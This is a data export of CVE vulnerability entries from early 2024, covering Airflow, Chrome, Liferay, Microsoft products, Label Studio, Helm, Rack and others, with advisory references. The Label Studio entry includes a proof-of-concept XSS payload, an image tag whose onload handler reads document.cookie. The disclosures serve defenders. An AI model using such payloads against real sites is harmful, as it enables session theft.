CVE    2024    26280    Candidate    Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability    MISC:https://github.com/apache/airflow/pull/37501   |   URL:https://github.com/apache/airflow/pull/37501   |   MISC:https://lists.apache.org/thread/knskxxxml95091rsnpxkpo1jjp8rj0fh   |   URL:https://lists.apache.org/thread/knskxxxml95091rsnpxkpo1jjp8rj0fh    Assigned (20240215)
CVE    2024    2628    Candidate    Inappropriate implementation in Downloads in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted URL. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/41487774   |   URL:https://issues.chromium.org/issues/41487774    Assigned (20240319)
CVE    2024    26270    Candidate    The Account Settings page in Liferay Portal 7.4.3.76 through 7.4.3.99, and Liferay DXP 2023.Q3 before patch 5, and 7.4 update 76 through 92 embeds the user’s hashed password in the page’s HTML source, which allows man-in-the-middle attackers to steal a user's hashed password.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26270   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26270    Assigned (20240215)
CVE    2024    2627    Candidate    Use after free in Canvas in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/41493290   |   URL:https://issues.chromium.org/issues/41493290    Assigned (20240319)
CVE    2024    26269    Candidate    Cross-site scripting (XSS) vulnerability in the Frontend JS module's portlet.js in Liferay Portal 7.2.0 through 7.4.3.37, and Liferay DXP 7.4 before update 38, 7.3 before update 11, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via the anchor (hash) part of a URL.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26269   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26269    Assigned (20240215)
CVE    2024    26268    Candidate    User enumeration vulnerability in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 8, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to determine if an account exists in the application by comparing the request's response time.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26268   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26268    Assigned (20240215)
CVE    2024    26267    Candidate    In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property `http.header.version.verbosity` is set to `full`, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via `Liferay-Portal` response header.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267    Assigned (20240215)
CVE    2024    26266    Candidate    Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.2.0 through 7.4.3.13, and older unsupported versions, and Liferay DXP 7.4 before update 10, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the first/middle/last name text field of the user who creates an entry in the (1) Announcement widget, or (2) Alerts widget.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26266   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26266    Assigned (20240215)
CVE    2024    26265    Candidate    The Image Uploader module in Liferay Portal 7.2.0 through 7.4.3.15, and older unsupported versions, and Liferay DXP 7.4 before update 16, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions relies on a request parameter to limit the size of files that can be uploaded, which allows remote authenticated users to upload arbitrarily large files to the system's temp folder by modifying the `maxFileSize` parameter.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26265   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26265    Assigned (20240215)
CVE    2024    26264    Candidate    EBM Technologies RISWEB's specific query function parameter does not properly restrict user input, and this feature page is accessible without login. This allows remote attackers to inject SQL commands without authentication, enabling them to read, modify, and delete database records.    MISC:https://www.twcert.org.tw/tw/cp-132-7677-b1c0f-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7677-b1c0f-1.html    Assigned (20240215)
CVE    2024    26263    Candidate    EBM Technologies RISWEB's specific URL path is not properly controlled by permission, allowing attackers to browse specific pages and query sensitive data without login.    MISC:https://www.twcert.org.tw/tw/cp-132-7676-9418d-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7676-9418d-1.html    Assigned (20240215)
CVE    2024    26262    Candidate    EBM Technologies Uniweb/SoliPACS WebServer's query functionality lacks proper restrictions of user input, allowing remote attackers authenticated as a regular user to inject SQL commands for reading, modifying, and deleting database records, as well as executing system commands. Attackers may even leverage the dbo privilege in the database for privilege escalation, elevating their privileges to administrator.    MISC:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html    Assigned (20240215)
CVE    2024    26261    Candidate    The functionality for file download in HGiga OAKlouds' certain modules contains an Arbitrary File Read and Delete vulnerability. Attackers can put file path in specific request parameters, allowing them to download the file without login. Furthermore, the file will be deleted after being downloaded.    MISC:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html    Assigned (20240215)
CVE    2024    26260    Candidate    The functionality for synchronization in HGiga OAKlouds' certain modules has an OS Command Injection vulnerability, allowing remote attackers to inject system commands within specific request parameters. This enables the execution of arbitrary code on the remote server without permission.    MISC:https://www.twcert.org.tw/tw/cp-132-7673-688b7-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7673-688b7-1.html    Assigned (20240215)
CVE    2024    2626    Candidate    Out of bounds read in Swiftshader in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/40945098   |   URL:https://issues.chromium.org/issues/40945098    Assigned (20240319)
CVE    2024    2625    Candidate    Object lifecycle issue in V8 in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-01f4c93547   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/   |   FEDORA:FEDORA-2024-ec79868e3b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/   |   FEDORA:FEDORA-2024-f9eb1130c8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html   |   MISC:https://issues.chromium.org/issues/327740539   |   URL:https://issues.chromium.org/issues/327740539    Assigned (20240319)
CVE    2024    26247    Candidate    Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability    MISC:Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26247    Assigned (20240215)
CVE    2024    2622    Candidate    A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318. It has been classified as critical. This affects an unknown part of the file /api/client/editemedia.php. The manipulation of the argument number/enterprise_uuid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257199.    MISC:VDB-257199 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257199   |   MISC:VDB-257199 | Fujian Kelixin Communication Command and Dispatch Platform editemedia.php sql injection   |   URL:https://vuldb.com/?id.257199   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-editemedia.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-editemedia.pdf    Assigned (20240318)
CVE    2024    2621    Candidate    A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. The manipulation of the argument uuid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257198 is the identifier assigned to this vulnerability.    MISC:VDB-257198 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257198   |   MISC:VDB-257198 | Fujian Kelixin Communication Command and Dispatch Platform pwd_update.php sql injection   |   URL:https://vuldb.com/?id.257198   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf    Assigned (20240318)
CVE    2024    26204    Candidate    Outlook for Android Information Disclosure Vulnerability    MISC:Outlook for Android Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26204    Assigned (20240214)
CVE    2024    26203    Candidate    Azure Data Studio Elevation of Privilege Vulnerability    MISC:Azure Data Studio Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26203    Assigned (20240214)
CVE    2024    26201    Candidate    Microsoft Intune Linux Agent Elevation of Privilege Vulnerability    MISC:Microsoft Intune Linux Agent Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26201    Assigned (20240214)
CVE    2024    2620    Candidate    A vulnerability has been found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this vulnerability is an unknown functionality of the file api/client/down_file.php. The manipulation of the argument uuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257197 was assigned to this vulnerability.    MISC:VDB-257197 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257197   |   MISC:VDB-257197 | Fujian Kelixin Communication Command and Dispatch Platform down_file.php sql injection   |   URL:https://vuldb.com/?id.257197   |   MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-down_file.pdf   |   URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-down_file.pdf    Assigned (20240318)
CVE    2024    26199    Candidate    Microsoft Office Elevation of Privilege Vulnerability    MISC:Microsoft Office Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26199    Assigned (20240214)
CVE    2024    26198    Candidate    Microsoft Exchange Server Remote Code Execution Vulnerability    MISC:Microsoft Exchange Server Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26198    Assigned (20240214)
CVE    2024    26197    Candidate    Windows Standards-Based Storage Management Service Denial of Service Vulnerability    MISC:Windows Standards-Based Storage Management Service Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26197    Assigned (20240214)
CVE    2024    26196    Candidate    Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability    MISC:Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26196    Assigned (20240214)
CVE    2024    26192    Candidate    Microsoft Edge (Chromium-based) Information Disclosure Vulnerability    MISC:Microsoft Edge (Chromium-based) Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26192    Assigned (20240214)
CVE    2024    26190    Candidate    Microsoft QUIC Denial of Service Vulnerability    MISC:Microsoft QUIC Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26190    Assigned (20240214)
CVE    2024    26185    Candidate    Windows Compressed Folder Tampering Vulnerability    MISC:Windows Compressed Folder Tampering Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26185    Assigned (20240214)
CVE    2024    26182    Candidate    Windows Kernel Elevation of Privilege Vulnerability    MISC:Windows Kernel Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26182    Assigned (20240214)
CVE    2024    26181    Candidate    Windows Kernel Denial of Service Vulnerability    MISC:Windows Kernel Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26181    Assigned (20240214)
CVE    2024    26177    Candidate    Windows Kernel Information Disclosure Vulnerability    MISC:Windows Kernel Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26177    Assigned (20240214)
CVE    2024    26170    Candidate    Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability    MISC:Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26170    Assigned (20240214)
CVE    2024    26169    Candidate    Windows Error Reporting Service Elevation of Privilege Vulnerability    MISC:Windows Error Reporting Service Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26169    Assigned (20240214)
CVE    2024    26167    Candidate    Microsoft Edge for Android Spoofing Vulnerability    MISC:Microsoft Edge for Android Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26167    Assigned (20240214)
CVE    2024    26166    Candidate    Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability    MISC:Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26166    Assigned (20240214)
CVE    2024    26165    Candidate    Visual Studio Code Elevation of Privilege Vulnerability    MISC:Visual Studio Code Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26165    Assigned (20240214)
CVE    2024    26164    Candidate    Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability    MISC:Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26164    Assigned (20240214)
CVE    2024    26162    Candidate    Microsoft ODBC Driver Remote Code Execution Vulnerability    MISC:Microsoft ODBC Driver Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26162    Assigned (20240214)
CVE    2024    26160    Candidate    Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability    MISC:Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26160    Assigned (20240214)
CVE    2024    2616    Candidate    To harden ICU against exploitation, the behavior for out-of-memory conditions was changed to crash instead of attempt to continue. This vulnerability affects Firefox ESR < 115.9 and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1846197   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1846197   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    26152    Candidate    ### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a [`Choices`](https://labelstud.io/tags/choices) or [`Labels`](https://labelstud.io/tags/labels) tag, resulting in an XSS vulnerability. ### Details Need permission to use the "data import" function. This was reproduced on Label Studio 1.10.1. ### PoC 1. Create a project. ![Create a project](https://github.com/HumanSignal/label-studio/assets/3943358/9b1536ad-feac-4238-a1bd-ca9b1b798673) 2. Upload a file containing the payload using the "Upload Files" function. ![2 Upload a file containing the payload using the Upload Files function](https://github.com/HumanSignal/label-studio/assets/3943358/26bb7af1-1cd2-408f-9adf-61e31a5b7328) ![3 complete](https://github.com/HumanSignal/label-studio/assets/3943358/f2f62774-1fa6-4456-9e6f-8fa1ca0a2d2e) The following are the contents of the files used in the PoC ``` { "data": { "prompt": "labelstudio universe image", "images": [ { "value": "id123#0", "style": "margin: 5px", "html": "<img width='400' src='https://labelstud.io/_astro/images-tab.64279c16_ZaBSvC.avif' onload=alert(document.cookie)>" } ] } } ``` 3. Select the text-to-image generation labeling template of Ranking and scoring ![3 Select the text-to-image generation labelling template for Ranking and scoring](https://github.com/HumanSignal/label-studio/assets/3943358/f227f49c-a718-4738-bc2a-807da4f97155) ![5 save](https://github.com/HumanSignal/label-studio/assets/3943358/9b529f8a-8e99-4bb0-bdf6-bb7a95c9b75d) 4. Select a task ![4 Select a task](https://github.com/HumanSignal/label-studio/assets/3943358/71856b7a-2b1f-44ea-99ab-fc48bc20caa7) 5. Check that the script is running ![5 Check that the script is running](https://github.com/HumanSignal/label-studio/assets/3943358/e396ae7b-a591-4db7-afe9-5bab30b48cb9) ### Impact Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, it can become a source of further attacks, especially when linked to social engineering.    MISC:https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4deedf51ef6c8   |   URL:https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4deedf51ef6c8   |   MISC:https://github.com/HumanSignal/label-studio/pull/5232   |   URL:https://github.com/HumanSignal/label-studio/pull/5232   |   MISC:https://github.com/HumanSignal/label-studio/releases/tag/1.11.0   |   URL:https://github.com/HumanSignal/label-studio/releases/tag/1.11.0   |   MISC:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qfhg   |   URL:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qfhg    Assigned (20240214)
CVE    2024    26151    Candidate    The `mjml` PyPI package, found at the `FelixSchwarz/mjml-python` GitHub repo, is an unofficial Python port of MJML, a markup language created by Mailjet. All users of `FelixSchwarz/mjml-python` who insert untrusted data into mjml templates unless that data is checked in a very strict manner. User input like `&lt;script&gt;` would be rendered as `<script>` in the final HTML output. The attacker must be able to control some data which is later injected in an mjml template which is then sent out as email to other users. The attacker could control contents of email messages sent through the platform. The problem has been fixed in version 0.11.0 of this library. Versions before 0.10.0 are not affected by this security issue. As a workaround, ensure that potentially untrusted user input does not contain any sequences which could be rendered as HTML.    MISC:https://github.com/FelixSchwarz/mjml-python/commit/84c495da20a91640a1ca551ace17df7f3be644aa   |   URL:https://github.com/FelixSchwarz/mjml-python/commit/84c495da20a91640a1ca551ace17df7f3be644aa   |   MISC:https://github.com/FelixSchwarz/mjml-python/commit/8d410b7a500703080bb14ed7e3d2663fe16767e6   |   URL:https://github.com/FelixSchwarz/mjml-python/commit/8d410b7a500703080bb14ed7e3d2663fe16767e6   |   MISC:https://github.com/FelixSchwarz/mjml-python/issues/52   |   URL:https://github.com/FelixSchwarz/mjml-python/issues/52   |   MISC:https://github.com/FelixSchwarz/mjml-python/releases/tag/v0.11.0   |   URL:https://github.com/FelixSchwarz/mjml-python/releases/tag/v0.11.0   |   MISC:https://github.com/FelixSchwarz/mjml-python/security/advisories/GHSA-578p-fxmm-6229   |   URL:https://github.com/FelixSchwarz/mjml-python/security/advisories/GHSA-578p-fxmm-6229    Assigned (20240214)
CVE    2024    26150    Candidate    `@backstage/backend-common` is a common functionality library for backends for Backstage, an open platform for building developer portals. In `@backstage/backend-common` prior to versions 0.21.1, 0.20.2, and 0.19.10, paths checks with the `resolveSafeChildPath` utility were not exhaustive enough, leading to risk of path traversal vulnerabilities if symlinks can be injected by attackers. This issue is patched in `@backstage/backend-common` versions 0.21.1, 0.20.2, and 0.19.10.    MISC:https://github.com/backstage/backstage/commit/1ad2b1b61ebb430051f7d804b0cc7ebfe7922b6f   |   URL:https://github.com/backstage/backstage/commit/1ad2b1b61ebb430051f7d804b0cc7ebfe7922b6f   |   MISC:https://github.com/backstage/backstage/commit/78f892b3a84d63de2ba167928f171154c447b717   |   URL:https://github.com/backstage/backstage/commit/78f892b3a84d63de2ba167928f171154c447b717   |   MISC:https://github.com/backstage/backstage/commit/edf65d7d31e027599c2415f597d085ee84807871   |   URL:https://github.com/backstage/backstage/commit/edf65d7d31e027599c2415f597d085ee84807871   |   MISC:https://github.com/backstage/backstage/security/advisories/GHSA-2fc9-xpp8-2g9h   |   URL:https://github.com/backstage/backstage/security/advisories/GHSA-2fc9-xpp8-2g9h    Assigned (20240214)
CVE    2024    2615    Candidate    Memory safety bugs present in Firefox 123. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 124.    MISC:Memory safety bugs fixed in Firefox 124   |   URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1881074%2C1882438%2C1881650   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/    Assigned (20240318)
CVE    2024    26149    Candidate    Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. If an excessively large value is specified as the starting index for an array in `_abi_decode`, it can cause the read position to overflow. This results in the decoding of values outside the intended array bounds, potentially leading to exploitations in contracts that use arrays within `_abi_decode`. This vulnerability affects 0.3.10 and earlier versions.    MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-9p8r-4xp4-gw5w   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-9p8r-4xp4-gw5w    Assigned (20240214)
CVE    2024    26148    Candidate    Querybook is a user interface for querying big data. Prior to version 3.31.1, there is a vulnerability in Querybook's rich text editor that enables users to input arbitrary URLs without undergoing necessary validation. This particular security flaw allows the use of `javascript:` protocol which can potentially trigger arbitrary client-side execution. The most extreme exploit of this flaw could occur when an admin user unknowingly clicks on a cross-site scripting URL, thereby unintentionally compromising admin role access to the attacker. A patch to rectify this issue has been introduced in Querybook version `3.31.1`. The fix is backward compatible and automatically fixes existing DataDocs. There are no known workarounds for this issue, except for manually checking each URL prior to clicking on them.    MISC:https://github.com/pinterest/querybook/commit/bc620dabaaf13ff1dcb30af0b46a490403fb9908   |   URL:https://github.com/pinterest/querybook/commit/bc620dabaaf13ff1dcb30af0b46a490403fb9908   |   MISC:https://github.com/pinterest/querybook/pull/1412   |   URL:https://github.com/pinterest/querybook/pull/1412   |   MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-fh6g-gvvp-587f   |   URL:https://github.com/pinterest/querybook/security/advisories/GHSA-fh6g-gvvp-587f    Assigned (20240214)
CVE    2024    26147    Candidate    Helm is a package manager for Charts for Kubernetes. Versions prior to 3.14.2 contain an uninitialized variable vulnerability when Helm parses index and plugin yaml files missing expected content. When either an `index.yaml` file or a plugin's `plugin.yaml` file was missing all metadata, a panic would occur in Helm. In the Helm SDK, this is found when using the `LoadIndexFile` or `DownloadIndexFile` functions in the `repo` package or the `LoadDir` function in the `plugin` package. For the Helm client this impacts functions around adding a repository and all Helm functions if a malicious plugin is added as Helm inspects all known plugins on each invocation. This issue has been resolved in Helm v3.14.2. If a malicious plugin has been added which is causing all Helm client commands to panic, the malicious plugin can be manually removed from the filesystem. If using Helm SDK versions prior to 3.14.2, calls to affected functions can use `recover` to catch the panic.    MISC:https://github.com/helm/helm/commit/bb4cc9125503a923afb7988f3eb478722a8580af   |   URL:https://github.com/helm/helm/commit/bb4cc9125503a923afb7988f3eb478722a8580af   |   MISC:https://github.com/helm/helm/security/advisories/GHSA-r53h-jv2g-vpx6   |   URL:https://github.com/helm/helm/security/advisories/GHSA-r53h-jv2g-vpx6    Assigned (20240214)
CVE    2024    26146    Candidate    Rack is a modular Ruby web server interface. Carefully crafted headers can cause header parsing in Rack to take longer than expected resulting in a possible denial of service issue. Accept and Forwarded headers are impacted. Ruby 3.2 has mitigations for this problem, so Rack applications using Ruby 3.2 or newer are unaffected. This vulnerability is fixed in 2.0.9.4, 2.1.4.4, 2.2.8.1, and 3.0.9.1.    MISC:https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942   |   URL:https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942   |   MISC:https://github.com/rack/rack/commit/30b8e39a578b25d4bdcc082c1c52c6f164b59716   |   URL:https://github.com/rack/rack/commit/30b8e39a578b25d4bdcc082c1c52c6f164b59716   |   MISC:https://github.com/rack/rack/commit/6c5d90bdcec0949f7ba06db62fb740dab394b582   |   URL:https://github.com/rack/rack/commit/6c5d90bdcec0949f7ba06db62fb740dab394b582   |   MISC:https://github.com/rack/rack/commit/a227cd793778c7c3a827d32808058571569cda6f   |   URL:https://github.com/rack/rack/commit/a227cd793778c7c3a827d32808058571569cda6f   |   MISC:https://github.com/rack/rack/commit/e4c117749ba24a66f8ec5a08eddf68deeb425ccd   |   URL:https://github.com/rack/rack/commit/e4c117749ba24a66f8ec5a08eddf68deeb425ccd   |   MISC:https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f   |   URL:https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26146.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26146.yml    Assigned (20240214)
